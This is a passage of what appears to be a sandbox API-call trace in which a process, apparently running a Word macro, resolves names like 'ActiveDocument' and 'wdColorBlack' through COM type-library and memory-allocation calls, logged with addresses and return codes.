szName="wdColorBlack") returned 0x504433 [0060.347] strcpy_s (in: _Dst=0x33e4fb4760, _DstSize=0xd, _Src="wdColorBlack" | out: _Dst="wdColorBlack") returned 0x0 [0060.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb4760, cbMultiByte=13, lpWideCharStr=0x33e4fb45b0, cchWideChar=13 | out: lpWideCharStr="wdColorBlack") returned 13 [0060.347] IUnknown:AddRef (This=0x1d3980663b0) returned 0xa [0060.347] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="wdColorBlack", lHashVal=0x504433, pfName=0x33e4fb4680, pBstrLibName=0x33e4fb45b0 | out: pfName=0x33e4fb4680*=0, pBstrLibName=0x33e4fb45b0) returned 0x0 [0060.347] IUnknown:Release (This=0x1d3980663b0) returned 0x9 [0060.347] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x15 [0060.347] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="wdColorBlack", lHashVal=0x504433, pfName=0x33e4fb4680, pBstrLibName=0x33e4fb45b0 | out: pfName=0x33e4fb4680*=1, pBstrLibName=0x33e4fb45b0) returned 0x0 [0060.347] IUnknown:Release (This=0x1d3985c4c00) returned 0x14 [0060.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wdColorBlack", cchWideChar=-1, lpMultiByteStr=0x33e4fb4760, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wdColorBlack", lpUsedDefaultChar=0x0) returned 13 [0060.347] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="wdColorBlack") returned 0x504433 [0060.347] IUnknown:Release (This=0x1d39d552b18) returned 0x3 [0060.347] IUnknown:Release (This=0x1d39d552b18) returned 0x2 [0060.347] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a32b2bc6, cbMultiByte=13, lpWideCharStr=0x33e4fb46e0, cchWideChar=14 | out: lpWideCharStr="wdColorBlack") returned 13 [0060.347] ITypeComp:RemoteBind (in: This=0x1d39d552b20, szName="wdColorBlack", lHashVal=0x504433, wFlags=0x3, ppTInfo=0x33e4fb4698, pDescKind=0x33e4fb46ac, ppFuncDesc=0x33e4fb46b0, ppVarDesc=0x7ffd09599971, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb4698*=0x0, pDescKind=0x33e4fb46ac*=0, ppFuncDesc=0x33e4fb46b0, ppVarDesc=0x7ffd09599971, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172de2, cbMultiByte=13, lpWideCharStr=0x33e4fb4840, cchWideChar=14 | out: lpWideCharStr="wdColorBlack") returned 13 [0060.348] ITypeComp:RemoteBind (in: This=0x1d3980663c0, szName="wdColorBlack", lHashVal=0x504433, wFlags=0x3, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x0, pDescKind=0x33e4fb480c*=0, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172de2, cbMultiByte=13, lpWideCharStr=0x33e4fb4840, cchWideChar=14 | out: lpWideCharStr="wdColorBlack") returned 13 [0060.348] ITypeComp:RemoteBind (in: This=0x1d3985c4c10, szName="wdColorBlack", lHashVal=0x504433, wFlags=0x3, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x1d39d552cd0, pDescKind=0x33e4fb480c*=2, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.348] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552cd0, ppTypeAttr=0x33e4fb4800, pDummy=0x1d39d7d8ac0 | out: ppTypeAttr=0x33e4fb4800, pDummy=0x1d39d7d8ac0*=0x0) returned 0x0 [0060.348] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552cd0) returned 0x0 [0060.348] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d552cd0, ppTLib=0x33e4fb4540, pIndex=0x0 | out: ppTLib=0x33e4fb4540*=0x1d3985c4c00, pIndex=0x0) returned 0x0 [0060.348] ITypeLib:RemoteGetLibAttr (in: This=0x1d3985c4c00, ppTLibAttr=0x33e4fb4580, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4580, pDummy=0x0) returned 0x0 [0060.348] ITypeLib:LocalReleaseTLibAttr (This=0x1d3985c4c00) returned 0x0 [0060.348] IUnknown:Release (This=0x1d3985c4c00) returned 0x15 [0060.348] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d94bf90, cb=0x200) returned 0x1d39d98d4d0 [0060.419] IUnknown:AddRef (This=0x1d39d552cd0) returned 0x2 [0060.419] ITypeInfo:LocalReleaseVarDesc (This=0x1d39d552cd0) returned 0x0 [0060.419] IUnknown:Release (This=0x1d39d552cd0) returned 0x1 [0060.419] IUnknown:QueryInterface (in: This=0x1d39d552cd0, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4928 | out: ppvObject=0x33e4fb4928*=0x0) returned 0x80004002 [0060.419] IUnknown:AddRef (This=0x1d39d552cd0) returned 0x2 [0060.419] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d94afa0, cb=0x200) returned 0x1d39d98e340 [0060.419] IUnknown:Release (This=0x1d39d552cd0) returned 0x2 [0060.419] IUnknown:QueryInterface (in: This=0x1d39d552cd0, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.420] IUnknown:QueryInterface (in: This=0x1d39d552cd0, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.420] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ActiveDocument") returned 0x505cd3 [0060.420] strcpy_s (in: _Dst=0x33e4fb4760, _DstSize=0xf, _Src="ActiveDocument" | out: _Dst="ActiveDocument") returned 0x0 [0060.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb4760, cbMultiByte=15, lpWideCharStr=0x33e4fb45b0, cchWideChar=15 | out: lpWideCharStr="ActiveDocument") returned 15 [0060.420] IUnknown:AddRef (This=0x1d3980663b0) returned 0xa [0060.420] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="ActiveDocument", lHashVal=0x505cd3, pfName=0x33e4fb4680, pBstrLibName=0x33e4fb45b0 | out: pfName=0x33e4fb4680*=0, pBstrLibName=0x33e4fb45b0) returned 0x0 [0060.420] IUnknown:Release (This=0x1d3980663b0) returned 0x9 [0060.420] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x17 [0060.420] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="ActiveDocument", lHashVal=0x505cd3, pfName=0x33e4fb4680, pBstrLibName=0x33e4fb45b0 | out: pfName=0x33e4fb4680*=1, pBstrLibName=0x33e4fb45b0) returned 0x0 [0060.420] IUnknown:Release (This=0x1d3985c4c00) returned 0x16 [0060.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ActiveDocument", cchWideChar=-1, lpMultiByteStr=0x33e4fb4760, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ActiveDocument", lpUsedDefaultChar=0x0) returned 15 [0060.420] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ActiveDocument") returned 0x505cd3 [0060.420] IUnknown:Release (This=0x1d39d552b18) returned 0x3 [0060.420] IUnknown:Release (This=0x1d39d552b18) returned 0x2 [0060.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a32b2bf6, cbMultiByte=15, lpWideCharStr=0x33e4fb46e0, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0060.420] ITypeComp:RemoteBind (in: This=0x1d39d552b20, szName="ActiveDocument", lHashVal=0x505cd3, wFlags=0x3, ppTInfo=0x33e4fb4698, pDescKind=0x33e4fb46ac, ppFuncDesc=0x33e4fb46b0, ppVarDesc=0x7ffd09599971, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb4698*=0x0, pDescKind=0x33e4fb46ac*=0, ppFuncDesc=0x33e4fb46b0, ppVarDesc=0x7ffd09599971, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172d3a, cbMultiByte=15, lpWideCharStr=0x33e4fb4840, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0060.420] ITypeComp:RemoteBind (in: This=0x1d3980663c0, szName="ActiveDocument", lHashVal=0x505cd3, wFlags=0x3, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x0, pDescKind=0x33e4fb480c*=0, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172d3a, cbMultiByte=15, lpWideCharStr=0x33e4fb4840, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0060.420] ITypeComp:RemoteBind (in: This=0x1d3985c4c10, szName="ActiveDocument", lHashVal=0x505cd3, wFlags=0x3, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x1d39d552800, pDescKind=0x33e4fb480c*=4, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.421] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552800, ppTypeAttr=0x33e4fb4800, pDummy=0x1d39d965fc8 | out: ppTypeAttr=0x33e4fb4800, pDummy=0x1d39d965fc8*=0xfffffffe) returned 0x0 [0060.421] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552800) returned 0x0 [0060.421] ITypeInfo:GetRefTypeInfo (in: This=0x1d39d552800, hreftype=0xbd80, ppTInfo=0x33e4fb42e8 | out: ppTInfo=0x33e4fb42e8*=0x1d39d552800) returned 0x0 [0060.421] IUnknown:QueryInterface (in: This=0x1d39d552800, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb44b8 | out: ppvObject=0x33e4fb44b8*=0x0) returned 0x80004002 [0060.421] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552800, ppTypeAttr=0x33e4fb4338, pDummy=0x33e4fb44b8 | out: ppTypeAttr=0x33e4fb4338, pDummy=0x33e4fb44b8*=0x0) returned 0x0 [0060.421] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552800) returned 0x0 [0060.421] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a96a0, cb=0x20) returned 0x1d39d81bb20 [0060.421] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d4a9630, cb=0x28) returned 0x1d39d81bc40 [0060.421] IUnknown:Release (This=0x1d39d552800) returned 0x2 [0060.421] IUnknown:Release (This=0x1d39d552800) returned 0x2 [0060.421] IUnknown:QueryInterface (in: This=0x1d39d552800, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb46e8 | out: ppvObject=0x33e4fb46e8*=0x0) returned 0x80004002 [0060.421] IUnknown:QueryInterface (in: This=0x1d39d552800, riid=0x7ffce0bd1c48*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb45c0 | out: ppvObject=0x33e4fb45c0*=0x0) returned 0x80004002 [0060.421] IUnknown:Release (This=0x1d39d552800) returned 0x2 [0060.421] IUnknown:AddRef (This=0x1d39d552800) returned 0x3 [0060.421] ITypeInfo:LocalReleaseVarDesc (This=0x1d39d552800) returned 0x0 [0060.421] IUnknown:Release (This=0x1d39d552800) returned 0x2 [0060.421] IUnknown:QueryInterface (in: This=0x1d39d552800, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4928 | out: ppvObject=0x33e4fb4928*=0x0) returned 0x80004002 [0060.422] IUnknown:AddRef (This=0x1d39d552800) returned 0x3 [0060.422] IUnknown:Release (This=0x1d39d552800) returned 0x3 [0060.422] IUnknown:QueryInterface (in: This=0x1d39d552800, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.422] IUnknown:QueryInterface (in: This=0x1d39d552800, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.423] IUnknown:QueryInterface (in: This=0x1d39d5528b0, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4c48 | out: ppvObject=0x33e4fb4c48*=0x0) returned 0x80004002 [0060.423] IUnknown:QueryInterface (in: This=0x1d39d5528b0, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4c50 | out: ppvObject=0x33e4fb4c50*=0x0) returned 0x80004002 [0060.423] ITypeInfo:GetTypeComp (in: This=0x1d39d5528b0, ppTComp=0x33e4fb4c58 | out: ppTComp=0x33e4fb4c58*=0x1d39d5528b8) returned 0x0 [0060.423] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4a23f0 [0060.423] IUnknown:AddRef (This=0x1d39d5528b8) returned 0x3 [0060.423] IUnknown:Release (This=0x1d39d5528b8) returned 0x2 [0060.423] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d826650, cb=0x90) returned 0x1d39dc1b6c0 [0060.423] IUnknown:Release (This=0x1d39d5528b0) returned 0x1 [0060.423] IUnknown:Release (This=0x1d39d552800) returned 0x3 [0060.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172d3a, cbMultiByte=15, lpWideCharStr=0x33e4fb4740, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0060.423] ITypeComp:RemoteBind (in: This=0x1d39d5528b8, szName="ActiveDocument", lHashVal=0x505cd3, wFlags=0x3, ppTInfo=0x33e4fb46f8, pDescKind=0x33e4fb470c, ppFuncDesc=0x33e4fb4710, ppVarDesc=0x0, ppTypeComp=0x1d300000000, pDummy=0x0 | out: ppTInfo=0x33e4fb46f8*=0x1d39d5528b0, pDescKind=0x33e4fb470c*=1, ppFuncDesc=0x33e4fb4710, ppVarDesc=0x0, ppTypeComp=0x1d300000000, pDummy=0x0) returned 0x0 [0060.424] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d5528b0, ppTypeAttr=0x33e4fb4700, pDummy=0x1d39d7d8b40 | out: ppTypeAttr=0x33e4fb4700, pDummy=0x1d39d7d8b40*=0x10000) returned 0x0 [0060.424] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d5528b0) returned 0x0 [0060.424] ITypeInfo:GetRefTypeInfo (in: This=0x1d39d5528b0, hreftype=0xbf00, ppTInfo=0x33e4fb3fb8 | out: ppTInfo=0x33e4fb3fb8*=0x1d39d552a68) returned 0x0 [0060.424] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4188 | out: ppvObject=0x33e4fb4188*=0x0) returned 0x80004002 [0060.424] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552a68, ppTypeAttr=0x33e4fb4008, pDummy=0x33e4fb4188 | out: ppTypeAttr=0x33e4fb4008, pDummy=0x33e4fb4188*=0x0) returned 0x0 [0060.424] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552a68) returned 0x0 [0060.424] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.424] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d5528b0, ppTypeAttr=0x33e4fb44b0, pDummy=0x0 | out: ppTypeAttr=0x33e4fb44b0, pDummy=0x0) returned 0x0 [0060.424] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d5528b0) returned 0x0 [0060.424] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.424] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.424] IUnknown:QueryInterface (in: This=0x1d39d5528b0, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb4560 | out: ppvObject=0x33e4fb4560*=0x1d39d5528b0) returned 0x0 [0060.424] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x1d39d5528b0, memid=3, invkind=2, pFuncIndex=0x33e4fb45a0 | out: pFuncIndex=0x33e4fb45a0*=0x6) returned 0x0 [0060.424] ITypeInfo2:GetFuncCustData (in: This=0x1d39d5528b0, index=0x6, GUID=0x7ffce0bd6f38*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x33e4fb45b8 | out: pVarVal=0x33e4fb45b8*(varType=0x0, wReserved1=0x0, wReserved2=0x1d3, wReserved3=0x0, varVal1=0x33e4fb4660, varVal2=0x33e4fb4740)) returned 0x0 [0060.424] IUnknown:Release (This=0x1d39d5528b0) returned 0x2 [0060.424] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4518 | out: ppvObject=0x33e4fb4518*=0x0) returned 0x80004002 [0060.424] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bd1c48*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb43f0 | out: ppvObject=0x33e4fb43f0*=0x0) returned 0x80004002 [0060.424] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.424] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bcf4b0*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4518 | out: ppvObject=0x33e4fb4518*=0x0) returned 0x80004002 [0060.424] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bd1c48*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb43f0 | out: ppvObject=0x33e4fb43f0*=0x0) returned 0x80004002 [0060.424] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.425] IUnknown:AddRef (This=0x1d39d5528b0) returned 0x3 [0060.425] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d5528b0) returned 0x0 [0060.425] IUnknown:Release (This=0x1d39d5528b0) returned 0x2 [0060.425] IUnknown:QueryInterface (in: This=0x1d39d5528b0, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb47b8 | out: ppvObject=0x33e4fb47b8*=0x0) returned 0x80004002 [0060.425] IUnknown:AddRef (This=0x1d39d5528b0) returned 0x3 [0060.425] IUnknown:Release (This=0x1d39d5528b0) returned 0x3 [0060.425] IUnknown:QueryInterface (in: This=0x1d39d5528b0, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4928 | out: ppvObject=0x33e4fb4928*=0x0) returned 0x80004002 [0060.425] IUnknown:QueryInterface (in: This=0x1d39d5528b0, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4920 | out: ppvObject=0x33e4fb4920*=0x0) returned 0x80004002 [0060.425] IUnknown:QueryInterface (in: This=0x1d39d552800, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4960 | out: ppvObject=0x33e4fb4960*=0x0) returned 0x80004002 [0060.425] IUnknown:QueryInterface (in: This=0x1d39d552800, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4968 | out: ppvObject=0x33e4fb4968*=0x0) returned 0x80004002 [0060.425] IUnknown:QueryInterface (in: This=0x1d39d552800, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb4958 | out: ppvObject=0x33e4fb4958*=0x1d39d552800) returned 0x0 [0060.425] ITypeInfo2:GetTypeKind (in: This=0x1d39d552800, pTypeKind=0x33e4fb49b4 | out: pTypeKind=0x33e4fb49b4*=5) returned 0x0 [0060.425] IUnknown:Release (This=0x1d39d552800) returned 0x4 [0060.425] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d5528b0, ppTypeAttr=0x33e4fb4260, pDummy=0x0 | out: ppTypeAttr=0x33e4fb4260, pDummy=0x0) returned 0x0 [0060.425] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d5528b0) returned 0x0 [0060.425] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552800, ppTypeAttr=0x33e4fb4260, pDummy=0x0 | out: ppTypeAttr=0x33e4fb4260, pDummy=0x0) returned 0x0 [0060.425] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39dbc2c30 [0060.425] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39d8b13f0 [0060.426] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552800) returned 0x0 [0060.426] IUnknown:Release (This=0x1d39d5528b0) returned 0x3 [0060.426] IUnknown:Release (This=0x1d39d552800) returned 0x3 [0060.426] IUnknown:AddRef (This=0x1d39d5528b0) returned 0x4 [0060.426] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d5528b0, ppTypeAttr=0x33e4fb4b78, pDummy=0x0 | out: ppTypeAttr=0x33e4fb4b78, pDummy=0x0) returned 0x0 [0060.426] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d5528b0) returned 0x0 [0060.426] IUnknown:Release (This=0x1d39d5528b0) returned 0x3 [0060.426] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x26d) returned 0x1d39808b080 [0060.426] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.426] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.426] GetCurrentProcess () returned 0xffffffffffffffff [0060.426] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39808b080, dwSize=0x4c) returned 1 [0060.426] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39808b080) [0060.426] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d5528b0, ppTypeAttr=0x33e4fb4110, pDummy=0x0 | out: ppTypeAttr=0x33e4fb4110, pDummy=0x0) returned 0x0 [0060.426] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d5528b0) returned 0x0 [0060.426] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x0, cb=0x412) returned 0x1d39dbc2390 [0060.426] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4c98 | out: ppvObject=0x33e4fb4c98*=0x0) returned 0x80004002 [0060.426] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4ca0 | out: ppvObject=0x33e4fb4ca0*=0x0) returned 0x80004002 [0060.426] ITypeInfo:GetTypeComp (in: This=0x1d39d552b18, ppTComp=0x33e4fb4ca8 | out: ppTComp=0x33e4fb4ca8*=0x1d39d552b20) returned 0x0 [0060.426] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4a2630 [0060.426] IUnknown:AddRef (This=0x1d39d552b20) returned 0x5 [0060.426] IUnknown:Release (This=0x1d39d552b20) returned 0x4 [0060.426] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39dc1b6c0, cb=0xa0) returned 0x1d39dc0deb0 [0060.426] IUnknown:Release (This=0x1d39d552b18) returned 0x3 [0060.427] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172d6a, cbMultiByte=6, 